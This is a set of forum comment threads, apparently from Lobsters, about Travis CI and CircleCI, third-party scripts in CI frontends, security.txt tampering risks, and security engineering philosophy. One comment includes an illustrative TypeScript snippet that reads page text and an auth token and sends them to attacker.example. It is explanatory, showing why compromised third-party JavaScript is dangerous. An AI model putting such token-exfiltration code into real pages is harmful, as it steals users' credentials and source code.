                                                                        But, just to be clear: your builds take 8-14 minutes. What takes time for you is the low concurrency settings on Travis’s public/free infrastructure. It’s a shared resource; you only get so many parallel builds. That’s precisely why I referred to their paid offering: Travis is a vastly different beast when using the commercial infrastructure.

                                                                    I also recommend not running the full matrix for every pull request, but just the stuff that frequently catches errors.

                                                                    1. 3

                                                                      I was asking cmhamill.

                                                                          You were asking in a public forum. I didn’t ask you to rebut or debate my experiences with TravisCI. https://github.com/cmhamill – their email is on their GitHub profile if you’d like to speak with them without anyone else chiming in. I’m relating an objection that is tied to real time lost on my part and that of other maintainers. It is a persistent complaint of other people I work with in OSS. I’m glad TravisCI’s free offering exists, but I am not under the illusion that the value they’re providing was brought into existence ex nihilo with zero value derived from OSS.

                                                                      It’s a shared resource, you only get so many parallel builds. That’s precisely why I referred to their paid offering: travis is a vastly different beast when using the commercial infrastructure.

                                                                          We use commercial TravisCI at work. It’s better than CircleCI or Travis’s public offering, but still not close to running a CI service on a dedi (or several).

                                                                      I had to aggressively cache (multiple gigabytes) the build for Bloodhound before it stopped timing out. I’m glad their caching layer can tolerate something that fat but I wish it wasn’t necessary just to keep my builds working period.

                                                                      That combined with how unresponsive TravisCI has been in general leaves a sour taste. If there was a better open source CI option than something like DroneCI I’d probably have rented a dedi for the projects I work on already.

                                                                      1. 5

                                                                        You were asking in a public forum. I didn’t ask you to rebut or debate my experiences with TravisCI.

                                                                        You posted in a public forum and received some valid feedback based on the little context of your post ;)

                                                                    2. 1

                                                                      How long does it take on your local machine as a point of comparison?

                                                                      1. 2

                                                                        https://mail.haskell.org/pipermail/ghc-devs/2017-May/014200.html

                                                                        That’s just build, doesn’t include test suite, but the tests are a couple more minutes.

                                                                        1. 1

                                                                          Hm, that’s roughly the time your travis needs, too?

                                                                              https://travis-ci.org/bitemyapp/bloodhound/jobs/286053181#L539 -> 120.87 seconds

                                                                          1. 0

                                                                            Nope, the mailing list numbers do not include --fast and that makes a huge difference.

                                                                            You are off your rocker if you think the EC2 machines Travis uses are going to get close to what my workstation can do.

                                                                            1. 2

                                                                              Would you rather pay for a licensed software distribution that you drop in a fast dedicated computer you’ve bought and it turns that computer into a node in a CI cluster that can be used like Travis?

                                                                              Would you rather pay for a service just like Travis but more expensive and running on latest-and-greatest CPUs and such?

                                                                              1. 3

                                                                                Would you rather pay for a licensed software distribution that you drop in a fast dedicated computer you’ve bought and it turns that computer into a node in a CI cluster that can be used like Travis?

                                                                                If it actually worked well and I could test it before committing to a purchase, probably yes I would prefer that to losing control of my hardware or committing to a SAAS treadmill but businesses loooooooove recurring revenue and I can’t blame them.

                                                                                Would you rather pay for a service just like Travis but more expensive and running on latest-and-greatest CPUs and such?

                                                                                That seems like a more likely stop-gap as nobody seems to want to sell software OTS anymore. Note: it’s not really just CPUs, it’s tenancy. I’d rather pay SAAS service premium + actual-cost-of-leasing-hardware and get fast builds than the “maybe pay us extra, maybe get faster builds” games that most CI services play. Tell me what hardware I’m actually running on and with what tenancy so I don’t waste my time.

                                                                    3. 1

                                                                      Has anyone done this kind of dependency scan on Travis that this guy did on CircleCI? I suspect you will see much the same.

                                                                      Travis does have one clear advantage here in that it’s OSS so you can SEE its dependencies and make your own decisions. See my note about CircleCI needing to be better about communication above.

                                                                      1. 3

                                                                        Well… “scan”. They posted a screenshot of their network debugger tab :).

                                                                        Travis (.org) uses Pusher, but not their tracking scripts. It integrates Google Analytics and as such, communicates with it. ga.js is loaded from google.

                                                                        The page connects to:

                                                                        • api.travis-ci.org
                                                                        • cdn.travis-ci.org (which ends up being fast.ly)
                                                                        • gravatar.com (loading avatar images)
                                                                        • statuspage.io (loading some status information as JSON)
                                                                        • fonts.googleapis.com (loading the used fonts)
                                                                        • ws.pusherapp.com

                                                                          All in all, it is considerably less messy than CircleCI’s frontend.

                                                                        Also, Travis does not have your tokens or code in their web frontend, code is on Github, tokens should be encrypted using the encrypted environment: https://docs.travis-ci.com/user/environment-variables#Defining-encrypted-variables-in-.travis.yml

                                                                        1. 2

                                                                          You have proven my point perfectly.

                                                                            CircleCI’s only sin here is one of a lack of communication. There is nothing actually wrong with any of the callouts the article mentions; they just need to be VERY sure that their users are aware of exactly who is seeing the source code they upload. This should be an object lesson for anyone running a SaaS company, ESPECIALLY if said SaaS company caters to developers.

                                                                          1. 4

                                                                            This is not an apples to apples comparison, in my post I cited Javascripts only (which can make AJAX requests and extract source code), @skade cites that Travis loads fonts, images, and CSS from third party domains, which don’t have those properties; a compromise in CSS might change the appearance of a page but generally can’t result in your source code/API tokens being leaked to a third party.

                                                                            As far as I can tell, the only external JavaScript run by Travis CI is Pusher. So, no, it has not proven your point perfectly; in fact, it demonstrates the opposite.
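
                                                                            To make the distinction concrete, here’s an illustrative sketch of what a compromised third-party script could do that a compromised stylesheet can’t. The endpoint and storage key are made up:

                                                                            ```typescript
                                                                            // Illustrative only -- what a compromised third-party <script> could do.
                                                                            // A script running in the page shares the page's origin, so it can read
                                                                            // whatever the UI renders (source snippets, build logs) and send it away.
                                                                            async function exfiltrate(): Promise<void> {
                                                                              const pageText = document.body.innerText;         // anything visible in the UI
                                                                              const token = localStorage.getItem("auth-token"); // hypothetical storage key
                                                                              await fetch("https://attacker.example/collect", { // made-up attacker endpoint
                                                                                method: "POST",
                                                                                body: JSON.stringify({ pageText, token }),
                                                                              });
                                                                            }
                                                                            // A compromised font or stylesheet can change how the page looks,
                                                                            // but it can't execute code or read the DOM like this.
                                                                            ```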

                                                                  1. 2

                                                                    Migrating $DAYJOB’s Maven repository to use Deps, and working on the reliability and observability of the repository. Also looking to start bringing on more beta users very soon (the first one is already on!). Hand-in-hand with that will be improving the onboarding process.

                                                                    1. 2

                                                                      This feature looks like it will enable some nice security benefits. However, I’m a little concerned about the implementation (recursive chowns, hashing usernames to get UIDs, reusing UIDs where possible, still a relatively small UID space). As I read it I got the feeling that I would see this feature described in detail at the bottom of a very long postmortem debugging story about some pathological performance issues they ran into.
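
                                                                      To put a rough number on the collision concern, here’s a back-of-the-envelope sketch. SHA-256, the 16-bit UID range, and the username scheme are all assumptions on my part, not the actual implementation:

                                                                      ```typescript
                                                                      // Rough sketch: hash usernames into a small UID space and count how many
                                                                      // users it takes before two of them collide.
                                                                      import { createHash } from "node:crypto";

                                                                      const UID_SPACE = 65536; // assumed size; the real range may differ

                                                                      function usernameToUid(name: string): number {
                                                                        const digest = createHash("sha256").update(name).digest();
                                                                        return digest.readUInt32BE(0) % UID_SPACE;
                                                                      }

                                                                      const seen = new Map<number, string>();
                                                                      for (let i = 0; ; i++) {
                                                                        const name = `user${i}`;
                                                                        const uid = usernameToUid(name);
                                                                        if (seen.has(uid)) {
                                                                          // Birthday bound: expect this around sqrt(65536) = 256 users.
                                                                          console.log(`collision after ${i + 1} users: ${name} and ${seen.get(uid)} share uid ${uid}`);
                                                                          break;
                                                                        }
                                                                        seen.set(uid, name);
                                                                      }
                                                                      ```

                                                                      Collisions are exactly where the “reuse UIDs where possible” path kicks in, and that’s where I’d expect the surprising behaviour to hide.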

                                                                      1. 6

                                                                        Seems like this would require some extra infrastructure/monitoring to make sure the security.txt itself is not tampered with. Imagine malware infecting popular web servers and rewriting the email addresses to ones owned by the hacker.

                                                                        It wouldn’t be too far-fetched to register a fake domain and email address, appsec@example-security.net, for a target website example.com and get free 0day security disclosures sent to your inbox. The separate domain is a little suspicious, sure, but if security contact info were always as obvious as security@example.com (on the primary domain), then security.txt wouldn’t be all that necessary in the first place.

                                                                        What would the extra protection look like? Maybe start with PGP signing the security.txt file? But wait, the URL of the PGP key is part of the proposed contents of security.txt, so the hacker could change that URL too. Hmm.

                                                                        I guess my point is, adding an important file like this is not as trivial as it sounds. It’s not merely a convenience, but also an additional point of attack. Sure, it may not be that likely for the file to be compromised in the first place, but the rewards for compromising it could be pretty huge depending on the company/owner. So this really requires someone to pay attention to their web stack, which may be a tall order for a non-web developer trying to set up a simple info website for their non-web product, for example.

                                                                        1. 3

                                                                          I’m far from a security expert, but I don’t see the need for the file to be signed (certifying who signed it). You just need to be sure that it hasn’t changed over time, and if it has, you need a way to check that the change was legitimate. I was thinking of a few ideas that might be total crap:

                                                                          • Store a strong hash of it in a DNS TXT record? (See the sketch after this list.)
                                                                          • Store it on a blockchain? That way you have a history of previous hashes.
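
                                                                          A minimal sketch of the DNS TXT idea, assuming Node 18+ for the global fetch; the _security-txt record name and the sha256= format are invented for illustration:

                                                                          ```typescript
                                                                          // Sketch: verify a fetched security.txt against a hash published in DNS,
                                                                          // so an attacker has to compromise both the web server and DNS.
                                                                          import { promises as dns } from "node:dns";
                                                                          import { createHash } from "node:crypto";

                                                                          async function verifySecurityTxt(domain: string): Promise<boolean> {
                                                                            const res = await fetch(`https://${domain}/.well-known/security.txt`);
                                                                            const actual = createHash("sha256").update(await res.text()).digest("hex");

                                                                            // Invented convention: _security-txt.<domain> TXT "sha256=<hex digest>"
                                                                            const records = await dns.resolveTxt(`_security-txt.${domain}`);
                                                                            const expected = records.flat().join("").replace(/^sha256=/, "");

                                                                            return actual === expected;
                                                                          }

                                                                          verifySecurityTxt("example.com").then((ok) =>
                                                                            console.log(ok ? "security.txt matches its DNS hash" : "mismatch - possible tampering"),
                                                                          );
                                                                          ```

                                                                          Of course, an attacker who controls both the web server and DNS defeats this, so it raises the bar rather than solving the problem outright.
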
                                                                          1. 1

                                                                            The security implications of this don’t seem to be any different from hosting a security page in HTML on your website explaining your reporting process?

                                                                            1. 2

                                                                              I guess the differences are that security.txt is trying to be a standard, and it isn’t visible on the website itself. If the owner doesn’t know about it, a hacker can put one there without the owner ever noticing, since it never appears when browsing the site, but security researchers may still use it, assuming the owner put it there.

                                                                          1. 4

                                                                            If you’re a security practitioner, teaching yourself how to hack is also part of the “Hacking is Cool” dumb idea. Think about it for a couple of minutes: teaching yourself a bunch of exploits and how to use them means you’re investing your time in learning a bunch of tools and techniques that are going to go stale as soon as everyone has patched that particular hole. It means you’ve made part of your professional skill-set dependent on “Penetrate and Patch” and you’re going to have to be part of the arms-race if you want that skill-set to remain relevant and up-to-date. Wouldn’t it be more sensible to learn how to design security systems that are hack-proof than to learn how to identify security systems that are dumb?

                                                                            I read this as “Just do it right, don’t waste time learning how it goes wrong.”

                                                                            1. 3

                                                                              Yeah, I wouldn’t go all the way to “Just don’t make mistakes”, but I do think there is something to be said for taking things slower and spending more time designing carefully up-front, rather than falling into the Penetrate and Patch cycle. I’d still want to use all of the tools at my disposal to verify the design, but they can’t replace having a secure design, nor can they (fully) make an insecure design secure.

                                                                            1. 8

                                                                              I read this yesterday, and I’ve been thinking a lot about number three, “Penetrate and Patch”:

                                                                              In other words, you attack your firewall/software/website/whatever from the outside, identify a flaw in it, fix the flaw, and then go back to looking. […] In other words, the problem with “Penetrate and Patch” is not that it makes your code/implementation/system better by design, rather it merely makes it toughened by trial and error.

                                                                              It made me compare and contrast well-designed systems that go years without security issues with things like WordPress, which seems to have issues quarterly (monthly?).

                                                                              On number four, “Hacking is Cool”:

                                                                              My prediction is that the “Hacking is Cool” dumb idea will be a dead idea in the next 10 years. I’d like to fantasize that it will be replaced with its opposite idea, “Good Engineering is Cool” but so far there is no sign that’s likely to happen.

                                                                              The opposite has turned out to be true (this was written in 2005): with the rise of bug bounty programs, hacking is cooler than ever. Note, I’m not saying that bug bounties are bad or that we shouldn’t have them, but it does make me think more about the mindset behind them, and what kinds of behaviour they encourage in developers of systems.